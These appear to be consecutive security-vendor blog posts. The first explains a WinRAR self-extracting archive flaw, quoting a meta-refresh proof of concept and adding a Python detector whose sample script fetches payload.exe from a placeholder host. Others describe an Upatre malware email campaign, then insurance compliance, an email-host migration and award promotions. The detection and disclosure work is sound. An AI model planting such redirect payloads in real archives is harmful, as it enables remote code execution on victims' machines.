Researchers at Vulnerability-Lab have discovered an issue in WinRAR that allows remote code execution through self-extracting executables. Self-extracting archives (SFX files) are executable files that contain the code needed to extract their contents without an extractor being installed, so you can send someone an SFX file without worrying about whether they already have WinRAR or 7-Zip. This is convenient when dealing with external clients whose installed software you may not know.



The issue lies in the display text section of the SFX file, the text shown in the window when the file is opened. That section is rendered as HTML, and the HTML is free to pull in remote content. In the proof of concept published by Vulnerability-Lab, the HTML redirects to a server hosting a malicious executable, and WinRAR downloads and runs the remote file.


Simple HTML like this in the text window, with the attacker's URL placed after URL=, is enough to point WinRAR at the server hosting the code to be executed:

<html><head><title>poc</title><META http-equiv="refresh" content="0;URL="></head></html>

Something I noticed that did work with these was to use WinRAR's right-click option to extract the file. This prevents the display window, where the malicious HTML may be lurking, from opening and simply extracts the original file. But that of course doesn't mean the extracted file is safe.




Since the HTML is interpreted as soon as the SFX file is opened, no further user interaction is required for the vulnerability to be exploited. The archived file doesn't even need to be extracted; opening the SFX is enough. I was able to recreate this pretty simply, so this could be something we see in future malware campaigns. Since the SFX file still carries an .exe extension, hopefully most users are already cautious enough about unknown exes not to open it. This is certainly a prime example of why unknown attachments should be avoided.
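The check a responder would want for the behaviour described above is a scan of the SFX script for display text that reaches out to a remote host. The script below is an added example, not code from Vulnerability-Lab or AppRiver. It assumes the SFX script has already been pulled out of the archive comment (the comment sits inside the RAR data appended to the stub and may be compressed, so extract it with the archiver rather than grepping the .exe), and it assumes WinRAR's SFX syntax of a Text command followed by a brace-delimited block. Both sample scripts and the 198.51.100.7 address are constructed for the example; it also generalises beyond the meta refresh in the proof of concept to the other tags that can load remote content.

```python
import re

# Constructed examples of WinRAR SFX scripts (the script lives in the archive comment).
# The "Text" command with a brace-delimited body is assumed here to be how the
# "text to display in SFX window" is stored; adjust parse_sfx_script if your samples differ.
BENIGN_SCRIPT = """Title=Quarterly report
Path=C:\\Reports
Text
{
<html><body><p>Extracts the Q3 report to C:\\Reports.</p></body></html>
}
"""

# Mirrors the Vulnerability-Lab proof of concept: a meta refresh in the display text
# pointing at an attacker host. 198.51.100.7 is a documentation address, not a real C2.
MALICIOUS_SCRIPT = """Title=poc
Text
{
<html><head><title>poc</title>
<META http-equiv="refresh" content="0;URL=http://198.51.100.7/payload.exe"></head></html>
}
"""

# Only absolute URLs count as "remote"; a relative refresh stays inside the archive.
ABSOLUTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Ways HTML in the text window can pull content from elsewhere. The PoC used the first;
# the others are the obvious generalisation and are checked the same way.
REMOTE_REFERENCES = [
    ("meta-refresh", re.compile(
        r"""<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["'][^"']*?url\s*=\s*(?P<url>[^"'>\s]+)""",
        re.IGNORECASE)),
    ("frame", re.compile(r"""<i?frame\b[^>]*\bsrc\s*=\s*["']?(?P<url>[^"'>\s]+)""", re.IGNORECASE)),
    ("script", re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?(?P<url>[^"'>\s]+)""", re.IGNORECASE)),
    ("object", re.compile(r"""<(?:object|embed)\b[^>]*\b(?:data|src)\s*=\s*["']?(?P<url>[^"'>\s]+)""", re.IGNORECASE)),
]


def parse_sfx_script(script):
    """Split an SFX script into single-line Key=Value commands and brace-delimited blocks."""
    commands, blocks = {}, {}
    lines = script.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        # "Text" and "License=<title>" are followed by a body enclosed in { ... }
        if i + 1 < len(lines) and lines[i + 1].strip() == "{":
            name = line.split("=", 1)[0].lower()
            body = []
            i += 2
            while i < len(lines) and lines[i].strip() != "}":
                body.append(lines[i])
                i += 1
            blocks[name] = "\n".join(body)
        elif "=" in line:
            key, value = line.split("=", 1)
            commands[key.strip().lower()] = value.strip()
        elif line:
            commands[line.lower()] = ""
        i += 1
    return commands, blocks


def scan_sfx_script(script):
    """Return (kind, url) for every absolute remote reference in the SFX display text."""
    _, blocks = parse_sfx_script(script)
    html = blocks.get("text", "")
    findings = []
    for kind, pattern in REMOTE_REFERENCES:
        for match in pattern.finditer(html):
            url = match.group("url")
            if ABSOLUTE_URL.match(url):
                findings.append((kind, url))
    return findings


if __name__ == "__main__":
    for label, script in (("benign", BENIGN_SCRIPT), ("malicious", MALICIOUS_SCRIPT)):
        print(label, scan_sfx_script(script) or "no remote references")
```

Any hit is a reason to quarantine the SFX before anyone double-clicks it: legitimate installers have no business fetching content from the internet just to show their welcome text. Anything in the Setup= or Presetup= commands is worth a look at the same time, since those run a program after extraction by design.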

This morning we've been seeing yet another offering from the Upatre guys. This time it arrives as a rather lengthy, by comparison, email with the subject line "Attorney-client agreement". The storyline certainly leaves out a few major details, as it begins with a lawyer apparently already in court fighting some sort of breach-of-contract suit against the recipient. The opening paragraph even forgives the intended target for missing court this morning, noting that the court "understood". This must come as a real shock to those of us who don't keep a lawyer on retainer and didn't realize we were being sued. It would have been nice of this mystery lawyer to let you know before things got to this point, I would think.


Regardless, the email goes on to give a vague report on what happened in court that day and a few things the new defendant can expect as this fake lawsuit unfolds. This is a classic, if slightly long-winded, social engineering technique employed by cyber thieves to raise a little fear and a lot of curiosity in their victims, which they hope will entice them into falling for the ruse. The payload in this attack lives in an accompanying attachment. Each of these attachments is quasi-randomly named by stringing together three words from an apparent wordlist supplied by the command and control server. This randomization makes it slightly harder to nail down these files, simply because one cannot block on the filename alone. Otherwise, it's business as usual when it comes to stopping these nuisances.


One interesting detail about this line of attacks is that it seems to target older, out-of-date PCs. After running the samples on a couple of different operating systems, they only seemed to want to carry out their malicious intent on machines running Windows XP (I was using SP3). On newer versions the malware would shut itself down almost immediately after execution. Once operational, though, it begins hijacking system processes to get a foothold on its new victim. It then reaches out to check its public IP address and connects to its controller's IP on port 12299, where it reports information about the new target such as the IP it just looked up and the computer name. Following this, the malware adds a good number of registry entries dealing with security certificates, mostly disallowing them, and looks around for debugging tools.

Even on Windows XP these samples seemed a little rickety, as they tended to crash after a fairly short period of time, but they did have the best success rate on the XP machines. I wouldn't be surprised if this little issue is quickly resolved and we see the next campaign from these guys within the day. Seeing several different themes from this particular malware family has been commonplace, happening on a daily basis for quite some time now.

AppRiver’s SecureTide has everyone covered though as we’re blocking these preemptively to help keep your machines happy and healthy.

By Gretchen Clarke

Not unlike other vertical market business entities, insurance companies face a growing set of regulations and guidelines for protecting their data.


With an ever-evolving IT threat landscape, hacker attacks and network intrusions, protecting sensitive customer information is a growing concern for the insurance industry. What's more, the insurance industry faces security concerns from both sides of the table: serving the security needs of the insurers and serving the security needs of the insured. To illustrate, take a look at the list of sensitive information needed in order to purchase insurance:

  • Full Name
  • Date of Birth
  • Address
  • Social Security Number
  • Payment information
  • Annual income
  • Banking information
  • Other

While this information is necessary for those wanting to be insured, have you ever wondered where your information goes? Where it's stored? Was it scanned into a shared file on a network, or did you complete it online? Is it emailed to the corporate office?

In the last few years, ten states have added regulations mandating that insurance companies archive and encrypt any emails containing personal or private data. These states are California, Colorado, Delaware, Massachusetts, New York, Pennsylvania, Rhode Island, South Dakota, Vermont, and West Virginia, and many other states are adopting legislation to follow suit.

It's not just about being compliant with federal and state laws. It's also about building customer trust. By enhancing your service offering with best-in-breed security solutions, you're telling customers that their privacy matters and that you're taking the necessary steps to keep sensitive information secure.

To those companies who have traded photocopies for online documents, and to consumers who are concerned about protecting their personal or private data, we encourage you to take a look at your security footprint today. And if you have any questions along the way, we are here to help.

To learn more about AppRiver’s  cloud-based email encryption and email archiving & compliance solutions, please contact  (And make sure to ask about our current promotions on compliance-ready solutions!)

Last week, managed services provider Apptix announced it is shutting down its hosted Exchange service and selling part of its cloud customer division to GoDaddy. The plan is for Apptix customers who are currently on its hosted Exchange platform to migrate to GoDaddy’s Office 365.


The question is, who do you want to host your email and who would you like to work with?

In the IT world, that choice is critical because one size rarely fits all. Customers being moved off the Apptix Exchange service would be wise to ask several questions before committing to GoDaddy Office 365 (or any other email provider, for that matter).

Quite obviously, price is one key factor, but you also need to know just what you're getting for your money. For example, does your monthly fee cover customer care? If so, for how long? And do you get to speak to a live person who knows the technology?

Closely related to the question of price are your terms. What if you don’t like the new provider? Can you get your money back? Are you free to leave without penalty? And can you get month-to-month, pay-as-you-go billing?

Another issue is compatibility. In many cases, email is connected to other services like spam and virus protection, email encryption, and archiving and eDiscovery. Will your new platform support these features? And will it support your current provider of those services, or will it force you onto a different one?

As you discuss these issues, don't forget to talk about security. How much control do you have over where your data is stored? How serious is the provider about protecting your information? Is security built in at every level, or is it an "after-market" option?

These are just a few of the basic questions you should pose to anyone before you allow them to host your email. For some Apptix customers, moving to GoDaddy might be a great choice, but always remember that it is your choice to make.

Have questions about AppRiver’s Secure Hosted Exchange? Click here to learn more.

New and dangerous threats to businesses are emerging every day. That's why we work around the clock to make sure we're keeping your company safe and your information secure. But don't just take our word for it. Below are four separate industry honors that endorse AppRiver's success at delivering online protection to businesses:


It is a distinct privilege to be hand-selected by these publications for sound security practices. And we sure would appreciate your vote of confidence, too!

Please cast your vote today by clicking on any one of the above links.

Thank you for your ongoing support.  We sincerely appreciate it!